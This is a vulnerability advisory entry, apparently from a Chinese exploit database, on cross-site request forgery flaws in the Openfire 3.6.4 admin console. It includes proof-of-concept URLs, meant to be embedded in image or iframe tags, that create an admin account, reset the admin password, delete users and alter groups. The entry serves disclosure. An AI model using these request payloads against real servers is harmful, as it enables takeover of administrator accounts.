Openfire 3.6.4 Multiple CSRF Vulnerabilities

基本字段

漏洞编号:
SSV-96437
披露/发现时间:
2011-07-01
提交时间:
2017-09-12
漏洞等级:
漏洞类别:
跨站请求伪造
影响组件:
openfire
漏洞作者:
未知
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 共获得  0KB

Product Description:

Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance. (Source: http://www.igniterealtime.org/projects/openfire/)

Affected Files/Locations/Modules: user-create.jsp user-password.jsp user-delete.jsp group-create.jsp group-edit.jsp

Vulnerability Details:

An attacker can execute functions as an authenticated user by tricking a user into making requests to the Server. The attack works by including a link or script in a page that accesses a site to which the user is known (or is supposed) to have been authenticated. Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of cookie-based authentication credentials, arbitrary page redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exist in the administrative module, a successful attack could cause a complete compromise of the entire application. An attacker can send a link with the exploit to an administrator whose access could compromise the application.

Proof of Concept:

Create a html content (img, iframes etc.) with the following PoC URLs as src and host for the authenticated victim.

http://localhost:9090/user-create.jsp?username=tester&name=Riyaz&email=w
alikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin
=on&create=Create+User

http://localhost:9090/user-create.jsp?username=tester&name=Riyaz&email=w
alikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin
=on&create=Create+User>

http://localhost:9090/user-password.jsp?username=admin&password=secure-p
ass&passwordConfirm=secure-pass&update=Update+Password

http://localhost:9090/user-password.jsp?username=admin&password=secure-p
ass&passwordConfirm=secure-pass&update=Update+Password>

http://localhost:9090/user-delete.jsp?username=tester&delete=Delete+User

http://localhost:9090/user-delete.jsp?username=tester&delete=Delete+User

http://localhost:9090/group-create.jsp?name=NewGroup&description=New+Gro
up&create=Create+Group

http://localhost:9090/group-create.jsp?name=NewGroup&description=New+Gro
up&create=Create+Group>

http://localhost:9090/group-edit.jsp?group=NewGroup&add=Add&username=adm
in&addbutton=Add

http://localhost:9090/group-edit.jsp?group=NewGroup&add=Add&username=adm
in&addbutton=Add>

http://localhost:9090/group-edit.jsp?group=NewGroup&admin=abc () example co
m&updateMember=Update

http://localhost:9090/group-edit.jsp?group=NewGroup&admin=abc () example co
m&updateMember=Update>
共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1334
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负